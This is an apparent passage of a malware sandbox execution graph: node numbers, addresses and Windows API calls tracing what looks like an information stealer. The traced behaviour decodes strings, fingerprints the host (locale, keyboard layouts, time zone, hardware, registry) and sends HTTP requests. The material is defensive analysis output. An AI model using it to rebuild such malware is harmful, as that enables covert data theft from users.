14239->14242 14240->14239 14241->14242 14243 33a686 GetProcAddress 14242->14243 14244 33a69e 14242->14244 14243->14244 14245 33a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14244->14245 14246 335ca3 14244->14246 14245->14246 14247 321590 14246->14247 15368 321670 14247->15368 14250 33a7a0 lstrcpy 14251 3215b5 14250->14251 14252 33a7a0 lstrcpy 14251->14252 14253 3215c7 14252->14253 14254 33a7a0 lstrcpy 14253->14254 14255 3215d9 14254->14255 14256 33a7a0 lstrcpy 14255->14256 14257 321663 14256->14257 14258 335510 14257->14258 14259 335521 14258->14259 14260 33a820 2 API calls 14259->14260 14261 33552e 14260->14261 14262 33a820 2 API calls 14261->14262 14263 33553b 14262->14263 14264 33a820 2 API calls 14263->14264 14265 335548 14264->14265 14266 33a740 lstrcpy 14265->14266 14267 335555 14266->14267 14268 33a740 lstrcpy 14267->14268 14269 335562 14268->14269 14270 33a740 lstrcpy 14269->14270 14271 33556f 14270->14271 14272 33a740 lstrcpy 14271->14272 14312 33557c 14272->14312 14273 335643 StrCmpCA 14273->14312 14274 3356a0 StrCmpCA 14275 3357dc 14274->14275 14274->14312 14276 33a8a0 lstrcpy 14275->14276 14277 3357e8 14276->14277 14278 33a820 2 API calls 14277->14278 14280 3357f6 14278->14280 14279 33a820 lstrlen lstrcpy 14279->14312 14282 33a820 2 API calls 14280->14282 14281 335856 StrCmpCA 14283 335991 14281->14283 14281->14312 14287 335805 14282->14287 14286 33a8a0 lstrcpy 14283->14286 14284 33a740 lstrcpy 14284->14312 14285 33a7a0 lstrcpy 14285->14312 14288 33599d 14286->14288 14289 321670 lstrcpy 14287->14289 14291 33a820 2 API calls 14288->14291 14310 335811 14289->14310 14290 321590 lstrcpy 14290->14312 14292 3359ab 14291->14292 14295 33a820 2 API calls 14292->14295 14293 335a0b StrCmpCA 14296 335a16 Sleep 14293->14296 14297 335a28 14293->14297 14294 3351f0 20 API calls 14294->14312 14298 3359ba 14295->14298 14296->14312 14299 33a8a0 lstrcpy 14297->14299 14300 321670 lstrcpy 14298->14300 14301 335a34 14299->14301 14300->14310 14302 33a820 2 API calls 14301->14302 14303 335a43 14302->14303 14305 33a820 2 API calls 14303->14305 14304 3352c0 25 API calls 14304->14312 14307 335a52 14305->14307 14306 33578a StrCmpCA 14306->14312 14309 321670 lstrcpy 14307->14309 14308 33a8a0 lstrcpy 14308->14312 14309->14310 14310->13365 14311 33593f StrCmpCA 14311->14312 14312->14273 14312->14274 14312->14279 14312->14281 14312->14284 14312->14285 14312->14290 14312->14293 14312->14294 14312->14304 14312->14306 14312->14308 14312->14311 14314 337553 GetVolumeInformationA 14313->14314 14315 33754c 14313->14315 14316 337591 14314->14316 14315->14314 14317 3375fc GetProcessHeap RtlAllocateHeap 14316->14317 14318 337619 14317->14318 14319 337628 wsprintfA 14317->14319 14320 33a740 lstrcpy 14318->14320 14321 33a740 lstrcpy 14319->14321 14322 335da7 14320->14322 14321->14322 14322->13386 14324 33a7a0 lstrcpy 14323->14324 14325 324899 14324->14325 15377 3247b0 14325->15377 14327 3248a5 14328 33a740 lstrcpy 14327->14328 14329 3248d7 14328->14329 14330 33a740 lstrcpy 14329->14330 14331 3248e4 14330->14331 14332 33a740 lstrcpy 14331->14332 14333 3248f1 14332->14333 14334 33a740 lstrcpy 14333->14334 14335 3248fe 14334->14335 14336 33a740 lstrcpy 14335->14336 14337 32490b InternetOpenA StrCmpCA 14336->14337 14338 324944 14337->14338 14339 324ecb InternetCloseHandle 14338->14339 15383 338b60 14338->15383 14341 324ee8 14339->14341 15398 329ac0 CryptStringToBinaryA 14341->15398 14342 324963 15391 33a920 14342->15391 14345 324976 14347 33a8a0 lstrcpy 14345->14347 14352 32497f 14347->14352 14348 33a820 2 API calls 14349 324f05 14348->14349 14351 33a9b0 4 API calls 14349->14351 14350 324f27 ctype 14354 33a7a0 lstrcpy 14350->14354 14353 324f1b 14351->14353 14356 33a9b0 4 API calls 14352->14356 14355 33a8a0 lstrcpy 14353->14355 14367 324f57 14354->14367 14355->14350 14357 3249a9 14356->14357 14358 33a8a0 lstrcpy 14357->14358 14359 3249b2 14358->14359 14360 33a9b0 4 API calls 14359->14360 14361 3249d1 14360->14361 14362 33a8a0 lstrcpy 14361->14362 14363 3249da 14362->14363 14364 33a920 3 API calls 14363->14364 14365 3249f8 14364->14365 14366 33a8a0 lstrcpy 14365->14366 14368 324a01 14366->14368 14367->13389 14369 33a9b0 4 API calls 14368->14369 14370 324a20 14369->14370 14371 33a8a0 lstrcpy 14370->14371 14372 324a29 14371->14372 14373 33a9b0 4 API calls 14372->14373 14374 324a48 14373->14374 14375 33a8a0 lstrcpy 14374->14375 14376 324a51 14375->14376 14377 33a9b0 4 API calls 14376->14377 14378 324a7d 14377->14378 14379 33a920 3 API calls 14378->14379 14380 324a84 14379->14380 14381 33a8a0 lstrcpy 14380->14381 14382 324a8d 14381->14382 14383 324aa3 InternetConnectA 14382->14383 14383->14339 14384 324ad3 HttpOpenRequestA 14383->14384 14386 324b28 14384->14386 14387 324ebe InternetCloseHandle 14384->14387 14388 33a9b0 4 API calls 14386->14388 14387->14339 14389 324b3c 14388->14389 14390 33a8a0 lstrcpy 14389->14390 14391 324b45 14390->14391 14392 33a920 3 API calls 14391->14392 14393 324b63 14392->14393 14394 33a8a0 lstrcpy 14393->14394 14395 324b6c 14394->14395 14396 33a9b0 4 API calls 14395->14396 14397 324b8b 14396->14397 14398 33a8a0 lstrcpy 14397->14398 14399 324b94 14398->14399 14400 33a9b0 4 API calls 14399->14400 14401 324bb5 14400->14401 14402 33a8a0 lstrcpy 14401->14402 14403 324bbe 14402->14403 14404 33a9b0 4 API calls 14403->14404 14405 324bde 14404->14405 14406 33a8a0 lstrcpy 14405->14406 14407 324be7 14406->14407 14408 33a9b0 4 API calls 14407->14408 14409 324c06 14408->14409 14410 33a8a0 lstrcpy 14409->14410 14411 324c0f 14410->14411 14412 33a920 3 API calls 14411->14412 14413 324c2d 14412->14413 14414 33a8a0 lstrcpy 14413->14414 14415 324c36 14414->14415 14416 33a9b0 4 API calls 14415->14416 14417 324c55 14416->14417 14418 33a8a0 lstrcpy 14417->14418 14419 324c5e 14418->14419 14420 33a9b0 4 API calls 14419->14420 14421 324c7d 14420->14421 14422 33a8a0 lstrcpy 14421->14422 14423 324c86 14422->14423 14424 33a920 3 API calls 14423->14424 14425 324ca4 14424->14425 14426 33a8a0 lstrcpy 14425->14426 14427 324cad 14426->14427 14428 33a9b0 4 API calls 14427->14428 14429 324ccc 14428->14429 14430 33a8a0 lstrcpy 14429->14430 14431 324cd5 14430->14431 14432 33a9b0 4 API calls 14431->14432 14433 324cf6 14432->14433 14434 33a8a0 lstrcpy 14433->14434 14435 324cff 14434->14435 14436 33a9b0 4 API calls 14435->14436 14437 324d1f 14436->14437 14438 33a8a0 lstrcpy 14437->14438 14439 324d28 14438->14439 14440 33a9b0 4 API calls 14439->14440 14441 324d47 14440->14441 14442 33a8a0 lstrcpy 14441->14442 14443 324d50 14442->14443 14444 33a920 3 API calls 14443->14444 14445 324d6e 14444->14445 14446 33a8a0 lstrcpy 14445->14446 14447 324d77 14446->14447 14448 33a740 lstrcpy 14447->14448 14449 324d92 14448->14449 14450 33a920 3 API calls 14449->14450 14451 324db3 14450->14451 14452 33a920 3 API calls 14451->14452 14453 324dba 14452->14453 14454 33a8a0 lstrcpy 14453->14454 14455 324dc6 14454->14455 14456 324de7 lstrlen 14455->14456 14457 324dfa 14456->14457 14458 324e03 lstrlen 14457->14458 15397 33aad0 14458->15397 14460 324e13 HttpSendRequestA 14461 324e32 InternetReadFile 14460->14461 14462 324e67 InternetCloseHandle 14461->14462 14467 324e5e 14461->14467 14464 33a800 14462->14464 14464->14387 14465 33a9b0 4 API calls 14465->14467 14466 33a8a0 lstrcpy 14466->14467 14467->14461 14467->14462 14467->14465 14467->14466 15404 33aad0 14468->15404 14470 3317c4 StrCmpCA 14471 3317cf ExitProcess 14470->14471 14483 3317d7 14470->14483 14472 3319c2 14472->13391 14473 331913 StrCmpCA 14473->14483 14474 331932 StrCmpCA 14474->14483 14475 3318f1 StrCmpCA 14475->14483 14476 331951 StrCmpCA 14476->14483 14477 331970 StrCmpCA 14477->14483 14478 33187f StrCmpCA 14478->14483 14479 33185d StrCmpCA 14479->14483 14480 3318cf StrCmpCA 14480->14483 14481 3318ad StrCmpCA 14481->14483 14482 33a820 lstrlen lstrcpy 14482->14483 14483->14472 14483->14473 14483->14474 14483->14475 14483->14476 14483->14477 14483->14478 14483->14479 14483->14480 14483->14481 14483->14482 14485 33a7a0 lstrcpy 14484->14485 14486 325979 14485->14486 14487 3247b0 2 API calls 14486->14487 14488 325985 14487->14488 14489 33a740 lstrcpy 14488->14489 14490 3259ba 14489->14490 14491 33a740 lstrcpy 14490->14491 14492 3259c7 14491->14492 14493 33a740 lstrcpy 14492->14493 14494 3259d4 14493->14494 14495 33a740 lstrcpy 14494->14495 14496 3259e1 14495->14496 14497 33a740 lstrcpy 14496->14497 14498 3259ee InternetOpenA StrCmpCA 14497->14498 14499 325a1d 14498->14499 14500 325fc3 InternetCloseHandle 14499->14500 14501 338b60 3 API calls 14499->14501 14502 325fe0 14500->14502 14503 325a3c 14501->14503 14505 329ac0 4 API calls 14502->14505 14504 33a920 3 API calls 14503->14504 14506 325a4f 14504->14506 14507 325fe6 14505->14507 14508 33a8a0 lstrcpy 14506->14508 14510 33a820 2 API calls 14507->14510 14514 32601f ctype 14507->14514 14509 325a58 14508->14509 14517 33a9b0 4 API calls 14509->14517 14511 325ffd 14510->14511 14512 33a9b0 4 API calls 14511->14512 14513 326013 14512->14513 14515 33a8a0 lstrcpy 14513->14515 14516 33a7a0 lstrcpy 14514->14516 14515->14514 14525 32604f 14516->14525 14518 325a82 14517->14518 14519 33a8a0 lstrcpy 14518->14519 14520 325a8b 14519->14520 14521 33a9b0 4 API calls 14520->14521 14522 325aaa 14521->14522 14523 33a8a0 lstrcpy 14522->14523 14524 325ab3 14523->14524 14526 33a920 3 API calls 14524->14526 14525->13397 14527 325ad1 14526->14527 14528 33a8a0 lstrcpy 14527->14528 14529 325ada 14528->14529 14530 33a9b0 4 API calls 14529->14530 14531 325af9 14530->14531 14532 33a8a0 lstrcpy 14531->14532 14533 325b02 14532->14533 14534 33a9b0 4 API calls 14533->14534 14535 325b21 14534->14535 14536 33a8a0 lstrcpy 14535->14536 14537 325b2a 14536->14537 14538 33a9b0 4 API calls 14537->14538 14539 325b56 14538->14539 14540 33a920 3 API calls 14539->14540 14541 325b5d 14540->14541 14542 33a8a0 lstrcpy 14541->14542 14543 325b66 14542->14543 14544 325b7c InternetConnectA 14543->14544 14544->14500 14545 325bac HttpOpenRequestA 14544->14545 14547 325fb6 InternetCloseHandle 14545->14547 14548 325c0b 14545->14548 14547->14500 14549 33a9b0 4 API calls 14548->14549 14550 325c1f 14549->14550 14551 33a8a0 lstrcpy 14550->14551 14552 325c28 14551->14552 14553 33a920 3 API calls 14552->14553 14554 325c46 14553->14554 14555 33a8a0 lstrcpy 14554->14555 14556 325c4f 14555->14556 14557 33a9b0 4 API calls 14556->14557 14558 325c6e 14557->14558 14559 33a8a0 lstrcpy 14558->14559 14560 325c77 14559->14560 14561 33a9b0 4 API calls 14560->14561 14562 325c98 14561->14562 14563 33a8a0 lstrcpy 14562->14563 14564 325ca1 14563->14564 14565 33a9b0 4 API calls 14564->14565 14566 325cc1 14565->14566 14567 33a8a0 lstrcpy 14566->14567 14568 325cca 14567->14568 14569 33a9b0 4 API calls 14568->14569 14570 325ce9 14569->14570 14571 33a8a0 lstrcpy 14570->14571 14572 325cf2 14571->14572 14573 33a920 3 API calls 14572->14573 14574 325d10 14573->14574 14575 33a8a0 lstrcpy 14574->14575 14576 325d19 14575->14576 14577 33a9b0 4 API calls 14576->14577 14578 325d38 14577->14578 14579 33a8a0 lstrcpy 14578->14579 14580 325d41 14579->14580 14581 33a9b0 4 API calls 14580->14581 14582 325d60 14581->14582 14583 33a8a0 lstrcpy 14582->14583 14584 325d69 14583->14584 14585 33a920 3 API calls 14584->14585 14586 325d87 14585->14586 14587 33a8a0 lstrcpy 14586->14587 14588 325d90 14587->14588 14589 33a9b0 4 API calls 14588->14589 14590 325daf 14589->14590 14591 33a8a0 lstrcpy 14590->14591 14592 325db8 14591->14592 14593 33a9b0 4 API calls 14592->14593 14594 325dd9 14593->14594 14595 33a8a0 lstrcpy 14594->14595 14596 325de2 14595->14596 14597 33a9b0 4 API calls 14596->14597 14598 325e02 14597->14598 14599 33a8a0 lstrcpy 14598->14599 14600 325e0b 14599->14600 14601 33a9b0 4 API calls 14600->14601 14602 325e2a 14601->14602 14603 33a8a0 lstrcpy 14602->14603 14604 325e33 14603->14604 14605 33a920 3 API calls 14604->14605 14606 325e54 14605->14606 14607 33a8a0 lstrcpy 14606->14607 14608 325e5d 14607->14608 14609 325e70 lstrlen 14608->14609 15405 33aad0 14609->15405 14611 325e81 lstrlen GetProcessHeap RtlAllocateHeap 15406 33aad0 14611->15406 14613 325eae lstrlen 14614 325ebe 14613->14614 14615 325ed7 lstrlen 14614->14615 14616 325ee7 14615->14616 14617 325ef0 lstrlen 14616->14617 14618 325f03 14617->14618 14619 325f1a lstrlen 14618->14619 15407 33aad0 14619->15407 14621 325f2a HttpSendRequestA 14622 325f35 InternetReadFile 14621->14622 14623 325f6a InternetCloseHandle 14622->14623 14627 325f61 14622->14627 14623->14547 14625 33a9b0 4 API calls 14625->14627 14626 33a8a0 lstrcpy 14626->14627 14627->14622 14627->14623 14627->14625 14627->14626 14630 331077 14628->14630 14629 331151 14629->13399 14630->14629 14631 33a820 lstrlen lstrcpy 14630->14631 14631->14630 14633 330db7 14632->14633 14634 330f17 14633->14634 14635 330e27 StrCmpCA 14633->14635 14636 330e67 StrCmpCA 14633->14636 14637 330ea4 StrCmpCA 14633->14637 14638 33a820 lstrlen lstrcpy 14633->14638 14634->13407 14635->14633 14636->14633 14637->14633 14638->14633 14643 330f67 14639->14643 14640 331044 14640->13415 14641 330fb2 StrCmpCA 14641->14643 14642 33a820 lstrlen lstrcpy 14642->14643 14643->14640 14643->14641 14643->14642 14645 33a740 lstrcpy 14644->14645 14646 331a26 14645->14646 14647 33a9b0 4 API calls 14646->14647 14648 331a37 14647->14648 14649 33a8a0 lstrcpy 14648->14649 14650 331a40 14649->14650 14651 33a9b0 4 API calls 14650->14651 14652 331a5b 14651->14652 14653 33a8a0 lstrcpy 14652->14653 14654 331a64 14653->14654 14655 33a9b0 4 API calls 14654->14655 14656 331a7d 14655->14656 14657 33a8a0 lstrcpy 14656->14657 14658 331a86 14657->14658 14659 33a9b0 4 API calls 14658->14659 14660 331aa1 14659->14660 14661 33a8a0 lstrcpy 14660->14661 14662 331aaa 14661->14662 14663 33a9b0 4 API calls 14662->14663 14664 331ac3 14663->14664 14665 33a8a0 lstrcpy 14664->14665 14666 331acc 14665->14666 14667 33a9b0 4 API calls 14666->14667 14668 331ae7 14667->14668 14669 33a8a0 lstrcpy 14668->14669 14670 331af0 14669->14670 14671 33a9b0 4 API calls 14670->14671 14672 331b09 14671->14672 14673 33a8a0 lstrcpy 14672->14673 14674 331b12 14673->14674 14675 33a9b0 4 API calls 14674->14675 14676 331b2d 14675->14676 14677 33a8a0 lstrcpy 14676->14677 14678 331b36 14677->14678 14679 33a9b0 4 API calls 14678->14679 14680 331b4f 14679->14680 14681 33a8a0 lstrcpy 14680->14681 14682 331b58 14681->14682 14683 33a9b0 4 API calls 14682->14683 14684 331b76 14683->14684 14685 33a8a0 lstrcpy 14684->14685 14686 331b7f 14685->14686 14687 337500 6 API calls 14686->14687 14688 331b96 14687->14688 14689 33a920 3 API calls 14688->14689 14690 331ba9 14689->14690 14691 33a8a0 lstrcpy 14690->14691 14692 331bb2 14691->14692 14693 33a9b0 4 API calls 14692->14693 14694 331bdc 14693->14694 14695 33a8a0 lstrcpy 14694->14695 14696 331be5 14695->14696 14697 33a9b0 4 API calls 14696->14697 14698 331c05 14697->14698 14699 33a8a0 lstrcpy 14698->14699 14700 331c0e 14699->14700 15408 337690 GetProcessHeap RtlAllocateHeap 14700->15408 14703 33a9b0 4 API calls 14704 331c2e 14703->14704 14705 33a8a0 lstrcpy 14704->14705 14706 331c37 14705->14706 14707 33a9b0 4 API calls 14706->14707 14708 331c56 14707->14708 14709 33a8a0 lstrcpy 14708->14709 14710 331c5f 14709->14710 14711 33a9b0 4 API calls 14710->14711 14712 331c80 14711->14712 14713 33a8a0 lstrcpy 14712->14713 14714 331c89 14713->14714 15415 3377c0 GetCurrentProcess IsWow64Process 14714->15415 14717 33a9b0 4 API calls 14718 331ca9 14717->14718 14719 33a8a0 lstrcpy 14718->14719 14720 331cb2 14719->14720 14721 33a9b0 4 API calls 14720->14721 14722 331cd1 14721->14722 14723 33a8a0 lstrcpy 14722->14723 14724 331cda 14723->14724 14725 33a9b0 4 API calls 14724->14725 14726 331cfb 14725->14726 14727 33a8a0 lstrcpy 14726->14727 14728 331d04 14727->14728 14729 337850 3 API calls 14728->14729 14730 331d14 14729->14730 14731 33a9b0 4 API calls 14730->14731 14732 331d24 14731->14732 14733 33a8a0 lstrcpy 14732->14733 14734 331d2d 14733->14734 14735 33a9b0 4 API calls 14734->14735 14736 331d4c 14735->14736 14737 33a8a0 lstrcpy 14736->14737 14738 331d55 14737->14738 14739 33a9b0 4 API calls 14738->14739 14740 331d75 14739->14740 14741 33a8a0 lstrcpy 14740->14741 14742 331d7e 14741->14742 14743 3378e0 3 API calls 14742->14743 14744 331d8e 14743->14744 14745 33a9b0 4 API calls 14744->14745 14746 331d9e 14745->14746 14747 33a8a0 lstrcpy 14746->14747 14748 331da7 14747->14748 14749 33a9b0 4 API calls 14748->14749 14750 331dc6 14749->14750 14751 33a8a0 lstrcpy 14750->14751 14752 331dcf 14751->14752 14753 33a9b0 4 API calls 14752->14753 14754 331df0 14753->14754 14755 33a8a0 lstrcpy 14754->14755 14756 331df9 14755->14756 15417 337980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14756->15417 14759 33a9b0 4 API calls 14760 331e19 14759->14760 14761 33a8a0 lstrcpy 14760->14761 14762 331e22 14761->14762 14763 33a9b0 4 API calls 14762->14763 14764 331e41 14763->14764 14765 33a8a0 lstrcpy 14764->14765 14766 331e4a 14765->14766 14767 33a9b0 4 API calls 14766->14767 14768 331e6b 14767->14768 14769 33a8a0 lstrcpy 14768->14769 14770 331e74 14769->14770 15419 337a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14770->15419 14773 33a9b0 4 API calls 14774 331e94 14773->14774 14775 33a8a0 lstrcpy 14774->14775 14776 331e9d 14775->14776 14777 33a9b0 4 API calls 14776->14777 14778 331ebc 14777->14778 14779 33a8a0 lstrcpy 14778->14779 14780 331ec5 14779->14780 14781 33a9b0 4 API calls 14780->14781 14782 331ee5 14781->14782 14783 33a8a0 lstrcpy 14782->14783 14784 331eee 14783->14784 15422 337b00 GetUserDefaultLocaleName 14784->15422 14787 33a9b0 4 API calls 14788 331f0e 14787->14788 14789 33a8a0 lstrcpy 14788->14789 14790 331f17 14789->14790 14791 33a9b0 4 API calls 14790->14791 14792 331f36 14791->14792 14793 33a8a0 lstrcpy 14792->14793 14794 331f3f 14793->14794 14795 33a9b0 4 API calls 14794->14795 14796 331f60 14795->14796 14797 33a8a0 lstrcpy 14796->14797 14798 331f69 14797->14798 15426 337b90 14798->15426 14800 331f80 14801 33a920 3 API calls 14800->14801 14802 331f93 14801->14802 14803 33a8a0 lstrcpy 14802->14803 14804 331f9c 14803->14804 14805 33a9b0 4 API calls 14804->14805 14806 331fc6 14805->14806 14807 33a8a0 lstrcpy 14806->14807 14808 331fcf 14807->14808 14809 33a9b0 4 API calls 14808->14809 14810 331fef 14809->14810 14811 33a8a0 lstrcpy 14810->14811 14812 331ff8 14811->14812 15438 337d80 GetSystemPowerStatus 14812->15438 14815 33a9b0 4 API calls 14816 332018 14815->14816 14817 33a8a0 lstrcpy 14816->14817 14818 332021 14817->14818 14819 33a9b0 4 API calls 14818->14819 14820 332040 14819->14820 14821 33a8a0 lstrcpy 14820->14821 14822 332049 14821->14822 14823 33a9b0 4 API calls 14822->14823 14824 33206a 14823->14824 14825 33a8a0 lstrcpy 14824->14825 14826 332073 14825->14826 14827 33207e GetCurrentProcessId 14826->14827 15440 339470 OpenProcess 14827->15440 14830 33a920 3 API calls 14831 3320a4 14830->14831 14832 33a8a0 lstrcpy 14831->14832 14833 3320ad 14832->14833 14834 33a9b0 4 API calls 14833->14834 14835 3320d7 14834->14835 14836 33a8a0 lstrcpy 14835->14836 14837 3320e0 14836->14837 14838 33a9b0 4 API calls 14837->14838 14839 332100 14838->14839 14840 33a8a0 lstrcpy 14839->14840 14841 332109 14840->14841 15445 337e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14841->15445 14844 33a9b0 4 API calls 14845 332129 14844->14845 14846 33a8a0 lstrcpy 14845->14846 14847 332132 14846->14847 14848 33a9b0 4 API calls 14847->14848 14849 332151 14848->14849 14850 33a8a0 lstrcpy 14849->14850 14851 33215a 14850->14851 14852 33a9b0 4 API calls 14851->14852 14853 33217b 14852->14853 14854 33a8a0 lstrcpy 14853->14854 14855 332184 14854->14855 15449 337f60 14855->15449 14858 33a9b0 4 API calls 14859 3321a4 14858->14859 14860 33a8a0 lstrcpy 14859->14860 14861 3321ad 14860->14861 14862 33a9b0 4 API calls 14861->14862 14863 3321cc 14862->14863 14864 33a8a0 lstrcpy 14863->14864 14865 3321d5 14864->14865 14866 33a9b0 4 API calls 14865->14866 14867 3321f6 14866->14867 14868 33a8a0 lstrcpy 14867->14868 14869 3321ff 14868->14869 15462 337ed0 GetSystemInfo wsprintfA 14869->15462 14872 33a9b0 4 API calls 14873 33221f 14872->14873 14874 33a8a0 lstrcpy 14873->14874 14875 332228 14874->14875 14876 33a9b0 4 API calls 14875->14876 14877 332247 14876->14877 14878 33a8a0 lstrcpy 14877->14878 14879 332250 14878->14879 14880 33a9b0 4 API calls 14879->14880 14881 332270 14880->14881 14882 33a8a0 lstrcpy 14881->14882 14883 332279 14882->14883 15464 338100 GetProcessHeap RtlAllocateHeap 14883->15464 14886 33a9b0 4 API calls 14887 332299 14886->14887 14888 33a8a0 lstrcpy 14887->14888 14889 3322a2 14888->14889 14890 33a9b0 4 API calls 14889->14890 14891 3322c1 14890->14891 14892 33a8a0 lstrcpy 14891->14892 14893 3322ca 14892->14893 14894 33a9b0 4 API calls 14893->14894 14895 3322eb 14894->14895 14896 33a8a0 lstrcpy 14895->14896 14897 3322f4 14896->14897 15470 3387c0 14897->15470 14900 33a920 3 API calls 14901 33231e 14900->14901 14902 33a8a0 lstrcpy 14901->14902 14903 332327 14902->14903 14904 33a9b0 4 API calls 14903->14904 14905 332351 14904->14905 14906 33a8a0 lstrcpy 14905->14906 14907 33235a 14906->14907 14908 33a9b0 4 API calls 14907->14908 14909 33237a 14908->14909 14910 33a8a0 lstrcpy 14909->14910 14911 332383 14910->14911 14912 33a9b0 4 API calls 14911->14912 14913 3323a2 14912->14913 14914 33a8a0 lstrcpy 14913->14914 14915 3323ab 14914->14915 15475 3381f0 14915->15475 14917 3323c2 14918 33a920 3 API calls 14917->14918 14919 3323d5 14918->14919 14920 33a8a0 lstrcpy 14919->14920 14921 3323de 14920->14921 14922 33a9b0 4 API calls 14921->14922 14923 33240a 14922->14923 14924 33a8a0 lstrcpy 14923->14924 14925 332413 14924->14925 14926 33a9b0 4 API calls 14925->14926 14927 332432 14926->14927 14928 33a8a0 lstrcpy 14927->14928 14929 33243b 14928->14929 14930 33a9b0 4 API calls 14929->14930 14931 33245c 14930->14931 14932 33a8a0 lstrcpy 14931->14932 14933 332465 14932->14933 14934 33a9b0 4 API calls 14933->14934 14935 332484 14934->14935 14936 33a8a0 lstrcpy 14935->14936 14937 33248d 14936->14937 14938 33a9b0 4 API calls 14937->14938 14939 3324ae 14938->14939 14940 33a8a0 lstrcpy 14939->14940 14941 3324b7 14940->14941 15483 338320 14941->15483 14943 3324d3 14944 33a920 3 API calls 14943->14944 14945 3324e6 14944->14945 14946 33a8a0 lstrcpy 14945->14946 14947 3324ef 14946->14947 14948 33a9b0 4 API calls 14947->14948 14949 332519 14948->14949 14950 33a8a0 lstrcpy 14949->14950 14951 332522 14950->14951 14952 33a9b0 4 API calls 14951->14952 14953 332543 14952->14953 14954 33a8a0 lstrcpy 14953->14954 14955 33254c 14954->14955 14956 338320 17 API calls 14955->14956 14957 332568 14956->14957 14958 33a920 3 API calls 14957->14958 14959 33257b 14958->14959 14960 33a8a0 lstrcpy 14959->14960 14961 332584 14960->14961 14962 33a9b0 4 API calls 14961->14962 14963 3325ae 14962->14963 14964 33a8a0 lstrcpy 14963->14964 14965 3325b7 14964->14965 14966 33a9b0 4 API calls 14965->14966 14967 3325d6 14966->14967 14968 33a8a0 lstrcpy 14967->14968 14969 3325df 14968->14969 14970 33a9b0 4 API calls 14969->14970 14971 332600 14970->14971 14972 33a8a0 lstrcpy 14971->14972 14973 332609 14972->14973 15519 338680 14973->15519 14975 332620 14976 33a920 3 API calls 14975->14976 14977 332633 14976->14977 14978 33a8a0 lstrcpy 14977->14978 14979 33263c 14978->14979 14980 33265a lstrlen 14979->14980 14981 33266a 14980->14981 14982 33a740 lstrcpy 14981->14982 14983 33267c 14982->14983 14984 321590 lstrcpy 14983->14984 14985 33268d 14984->14985 15529 335190 14985->15529 14987 332699 14987->13419 15717 33aad0 14988->15717 14990 325009 InternetOpenUrlA 14994 325021 14990->14994 14991 3250a0 InternetCloseHandle InternetCloseHandle 14993 3250ec 14991->14993 14992 32502a InternetReadFile 14992->14994 14993->13423 14994->14991 14994->14992 15718 3298d0 14995->15718 14997 330759 14998 330a38 14997->14998 14999 33077d 14997->14999 15000 321590 lstrcpy 14998->15000 15002 330799 StrCmpCA 14999->15002 15001 330a49 15000->15001 15894 330250 15001->15894 15004 3307a8 15002->15004 15028 330843 15002->15028 15006 33a7a0 lstrcpy 15004->15006 15008 3307c3 15006->15008 15007 330865 StrCmpCA 15009 330874 15007->15009 15047 33096b 15007->15047 15010 321590 lstrcpy 15008->15010 15011 33a740 lstrcpy 15009->15011 15012 33080c 15010->15012 15014 330881 15011->15014 15015 33a7a0 lstrcpy 15012->15015 15013 33099c StrCmpCA 15017 3309ab 15013->15017 15036 330a2d 15013->15036 15018 33a9b0 4 API calls 15014->15018 15016 330823 15015->15016 15019 33a7a0 lstrcpy 15016->15019 15020 321590 lstrcpy 15017->15020 15021 3308ac 15018->15021 15022 33083e 15019->15022 15023 3309f4 15020->15023 15024 33a920 3 API calls 15021->15024 15721 32fb00 15022->15721 15026 33a7a0 lstrcpy 15023->15026 15027 3308b3 15024->15027 15029 330a0d 15026->15029 15030 33a9b0 4 API calls 15027->15030 15028->15007 15032 33a7a0 lstrcpy 15029->15032 15031 3308ba 15030->15031 15033 33a8a0 lstrcpy 15031->15033 15034 330a28 15032->15034 15837 330030 15034->15837 15036->13427 15047->15013 15369 33a7a0 lstrcpy 15368->15369 15370 321683 15369->15370 15371 33a7a0 lstrcpy 15370->15371 15372 321695 15371->15372 15373 33a7a0 lstrcpy 15372->15373 15374 3216a7 15373->15374 15375 33a7a0 lstrcpy 15374->15375 15376 3215a3 15375->15376 15376->14250 15378 3247c6 15377->15378 15379 324838 lstrlen 15378->15379 15403 33aad0 15379->15403 15381 324848 InternetCrackUrlA 15382 324867 15381->15382 15382->14327 15384 33a740 lstrcpy 15383->15384 15385 338b74 15384->15385 15386 33a740 lstrcpy 15385->15386 15387 338b82 GetSystemTime 15386->15387 15390 338b99 15387->15390 15388 33a7a0 lstrcpy 15389 338bfc 15388->15389 15389->14342 15390->15388 15392 33a931 15391->15392 15393 33a988 15392->15393 15395 33a968 lstrcpy lstrcat 15392->15395 15394 33a7a0 lstrcpy 15393->15394 15396 33a994 15394->15396 15395->15393 15396->14345 15397->14460 15399 324eee 15398->15399 15400 329af9 LocalAlloc 15398->15400 15399->14348 15399->14350 15400->15399 15401 329b14 CryptStringToBinaryA 15400->15401 15401->15399 15402 329b39 LocalFree 15401->15402 15402->15399 15403->15381 15404->14470 15405->14611 15406->14613 15407->14621 15536 3377a0 15408->15536 15411 3376c6 RegOpenKeyExA 15413 3376e7 RegQueryValueExA 15411->15413 15414 337704 RegCloseKey 15411->15414 15412 331c1e 15412->14703 15413->15414 15414->15412 15416 331c99 15415->15416 15416->14717 15418 331e09 15417->15418 15418->14759 15420 337a9a wsprintfA 15419->15420 15421 331e84 15419->15421 15420->15421 15421->14773 15423 331efe 15422->15423 15424 337b4d 15422->15424 15423->14787 15543 338d20 LocalAlloc CharToOemW 15424->15543 15427 33a740 lstrcpy 15426->15427 15428 337bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15427->15428 15437 337c25 15428->15437 15429 337c46 GetLocaleInfoA 15429->15437 15430 337d18 15431 337d28 15430->15431 15432 337d1e LocalFree 15430->15432 15434 33a7a0 lstrcpy 15431->15434 15432->15431 15433 33a9b0 lstrcpy lstrlen lstrcpy lstrcat 15433->15437 15435 337d37 15434->15435 15435->14800 15436 33a8a0 lstrcpy 15436->15437 15437->15429 15437->15430 15437->15433 15437->15436 15439 332008 15438->15439 15439->14815 15441 339493 GetModuleFileNameExA CloseHandle 15440->15441 15442 3394b5 15440->15442 15441->15442 15443 33a740 lstrcpy 15442->15443 15444 332091 15443->15444 15444->14830 15446 332119 15445->15446 15447 337e68 RegQueryValueExA 15445->15447 15446->14844 15448 337e8e RegCloseKey 15447->15448 15448->15446 15450 337fb9 GetLogicalProcessorInformationEx 15449->15450 15451 338029 15450->15451 15452 337fd8 GetLastError 15450->15452 15457 